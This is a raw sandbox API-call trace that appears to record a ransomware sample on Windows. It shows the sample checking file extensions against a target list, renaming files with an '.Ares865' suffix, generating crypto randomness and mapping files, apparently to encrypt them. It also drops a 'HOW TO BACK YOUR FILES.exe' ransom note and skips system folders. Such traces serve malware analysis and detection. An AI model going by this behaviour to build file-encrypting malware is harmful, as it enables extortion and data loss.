(lpString1="ini", lpString2="jet") returned -1 [0059.808] lstrlenW (lpString="jtx") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0059.808] lstrlenW (lpString="kdb") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0059.808] lstrlenW (lpString="kexi") returned 4 [0059.808] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0059.808] lstrlenW (lpString="kexic") returned 5 [0059.808] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0059.808] lstrlenW (lpString="kexis") returned 5 [0059.808] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0059.808] lstrlenW (lpString="lgc") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0059.808] lstrlenW (lpString="lwx") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0059.808] lstrlenW (lpString="maf") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0059.808] lstrlenW (lpString="maq") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0059.808] lstrlenW (lpString="mar") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0059.809] lstrlenW (lpString="marshal") returned 7 [0059.809] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0059.809] lstrlenW (lpString="mas") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0059.809] lstrlenW (lpString="mav") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0059.809] lstrlenW (lpString="maw") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0059.809] lstrlenW (lpString="mdbhtml") returned 7 [0059.809] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0059.809] lstrlenW (lpString="mdn") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0059.809] lstrlenW (lpString="mdt") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0059.809] lstrlenW (lpString="mfd") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0059.809] lstrlenW (lpString="mpd") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0059.809] lstrlenW (lpString="mrg") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0059.809] lstrlenW (lpString="mud") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0059.809] lstrlenW (lpString="mwb") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0059.809] lstrlenW (lpString="myd") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0059.809] lstrlenW (lpString="ndf") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0059.809] lstrlenW (lpString="nnt") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0059.809] lstrlenW (lpString="nrmlib") returned 6 [0059.809] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0059.809] lstrlenW (lpString="ns2") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0059.809] lstrlenW (lpString="ns3") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0059.809] lstrlenW (lpString="ns4") returned 3 [0059.809] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0059.810] lstrlenW (lpString="nsf") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0059.810] lstrlenW (lpString="nv") returned 2 [0059.810] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0059.810] lstrlenW (lpString="nv2") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0059.810] lstrlenW (lpString="nwdb") returned 4 [0059.810] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0059.810] lstrlenW (lpString="nyf") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0059.810] lstrlenW (lpString="odb") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0059.810] lstrlenW (lpString="odb") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0059.810] lstrlenW (lpString="oqy") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0059.810] lstrlenW (lpString="ora") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0059.810] lstrlenW (lpString="orx") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0059.810] lstrlenW (lpString="owc") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0059.810] lstrlenW (lpString="p96") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0059.810] lstrlenW (lpString="p97") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0059.810] lstrlenW (lpString="pan") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0059.810] lstrlenW (lpString="pdb") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0059.810] lstrlenW (lpString="pdm") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0059.810] lstrlenW (lpString="pnz") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0059.810] lstrlenW (lpString="qry") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0059.810] lstrlenW (lpString="qvd") returned 3 [0059.810] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0059.811] lstrlenW (lpString="rbf") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0059.811] lstrlenW (lpString="rctd") returned 4 [0059.811] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0059.811] lstrlenW (lpString="rod") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0059.811] lstrlenW (lpString="rodx") returned 4 [0059.811] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0059.811] lstrlenW (lpString="rpd") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0059.811] lstrlenW (lpString="rsd") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0059.811] lstrlenW (lpString="sas7bdat") returned 8 [0059.811] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0059.811] lstrlenW (lpString="sbf") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0059.811] lstrlenW (lpString="scx") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0059.811] lstrlenW (lpString="sdb") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0059.811] lstrlenW (lpString="sdc") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0059.811] lstrlenW (lpString="sdf") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0059.811] lstrlenW (lpString="sis") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0059.811] lstrlenW (lpString="spq") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0059.811] lstrlenW (lpString="te") returned 2 [0059.811] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0059.811] lstrlenW (lpString="teacher") returned 7 [0059.811] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0059.811] lstrlenW (lpString="tmd") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0059.811] lstrlenW (lpString="tps") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0059.811] lstrlenW (lpString="trc") returned 3 [0059.811] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0059.812] lstrlenW (lpString="trc") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0059.812] lstrlenW (lpString="trm") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0059.812] lstrlenW (lpString="udb") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0059.812] lstrlenW (lpString="udl") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0059.812] lstrlenW (lpString="usr") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0059.812] lstrlenW (lpString="v12") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0059.812] lstrlenW (lpString="vis") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0059.812] lstrlenW (lpString="vpd") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0059.812] lstrlenW (lpString="vvv") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0059.812] lstrlenW (lpString="wdb") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0059.812] lstrlenW (lpString="wmdb") returned 4 [0059.812] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0059.812] lstrlenW (lpString="wrk") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0059.812] lstrlenW (lpString="xdb") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0059.812] lstrlenW (lpString="xld") returned 3 [0059.812] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0059.812] lstrlenW (lpString="xmlff") returned 5 [0059.812] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0059.812] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Saved Games\\desktop.ini.Ares865") returned 53 [0059.812] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default user\\saved games\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Saved Games\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\saved games\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0059.813] CreateFileW (lpFileName="C:\\Users\\Default User\\Saved Games\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\saved games\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0059.813] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=282) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0059.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0059.818] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0059.821] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.821] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.821] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x164 [0059.838] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0059.844] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0059.848] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.848] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.849] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.857] CloseHandle (hObject=0x164) returned 1 [0059.857] CloseHandle (hObject=0x15c) returned 1 [0059.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0059.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0059.859] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e7cb40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0059.859] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0059.859] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e7cb40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0059.859] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0059.859] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2288 [0059.859] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Recent", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Recent") returned="C:\\Users\\Default User\\Recent" [0059.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6480 | out: hHeap=0x2b0000) returned 1 [0059.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0059.859] lstrlenW (lpString="C:\\Users\\Default User\\Recent") returned 28 [0059.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Recent" | out: lpString1="C:\\Users\\Default User\\Recent") returned="C:\\Users\\Default User\\Recent" [0059.859] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.859] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Recent\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\recent\\how to back your files.exe"), bFailIfExists=1) returned 0 [0059.860] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0059.860] GetLastError () returned 0x0 [0059.860] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0059.860] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0059.861] CloseHandle (hObject=0x12c) returned 1 [0059.868] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0059.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.868] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Recent\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e7cb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.870] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.870] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.870] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.870] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e7cb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.870] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.870] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0059.870] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.870] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.870] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0059.873] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.873] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="aoldtz.exe") returned 1 [0059.873] lstrcmpiW (lpString1="AutomaticDestinations", lpString2=".") returned 1 [0059.873] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="..") returned 1 [0059.873] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="windows") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="bootmgr") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="temp") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="pagefile.sys") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="boot") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="ids.txt") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="ntuser.dat") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="perflogs") returned -1 [0059.874] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="MSBuild") returned -1 [0059.874] lstrlenW (lpString="AutomaticDestinations") returned 21 [0059.874] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\*") returned 30 [0059.874] lstrcpyW (in: lpString1=0x2cce43a, lpString2="AutomaticDestinations" | out: lpString1="AutomaticDestinations") returned="AutomaticDestinations" [0059.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0059.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2d1ea0 [0059.874] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d2268 [0059.874] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ea2ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ea2ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="aoldtz.exe") returned 1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2=".") returned 1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="..") returned 1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="windows") returned -1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="bootmgr") returned 1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="temp") returned -1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="pagefile.sys") returned -1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="boot") returned 1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="ids.txt") returned -1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="ntuser.dat") returned -1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="perflogs") returned -1 [0059.874] lstrcmpiW (lpString1="CustomDestinations", lpString2="MSBuild") returned -1 [0059.874] lstrlenW (lpString="CustomDestinations") returned 18 [0059.874] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\AutomaticDestinations") returned 50 [0059.874] lstrcpyW (in: lpString1=0x2cce43a, lpString2="CustomDestinations" | out: lpString1="CustomDestinations") returned="CustomDestinations" [0059.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0059.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f2098 [0059.874] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2368 | out: ListHead=0x2e7710, ListEntry=0x2d2368) returned 0x2d2288 [0059.874] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0059.875] lstrlenW (lpString="desktop.ini") returned 11 [0059.875] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\CustomDestinations") returned 47 [0059.875] lstrcpyW (in: lpString1=0x2cce43a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0059.875] lstrlenW (lpString="desktop.ini") returned 11 [0059.875] lstrlenW (lpString="Ares865") returned 7 [0059.875] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0059.875] lstrlenW (lpString=".dll") returned 4 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0059.875] lstrlenW (lpString=".lnk") returned 4 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0059.875] lstrlenW (lpString=".ini") returned 4 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0059.875] lstrlenW (lpString=".sys") returned 4 [0059.875] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0059.875] lstrlenW (lpString="desktop.ini") returned 11 [0059.875] lstrlenW (lpString="bak") returned 3 [0059.875] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0059.875] lstrlenW (lpString="ba_") returned 3 [0059.875] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0059.875] lstrlenW (lpString="dbb") returned 3 [0059.875] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0059.875] lstrlenW (lpString="vmdk") returned 4 [0059.875] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0059.876] lstrlenW (lpString="rar") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0059.876] lstrlenW (lpString="zip") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0059.876] lstrlenW (lpString="tgz") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0059.876] lstrlenW (lpString="vbox") returned 4 [0059.876] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0059.876] lstrlenW (lpString="vdi") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0059.876] lstrlenW (lpString="vhd") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0059.876] lstrlenW (lpString="vhdx") 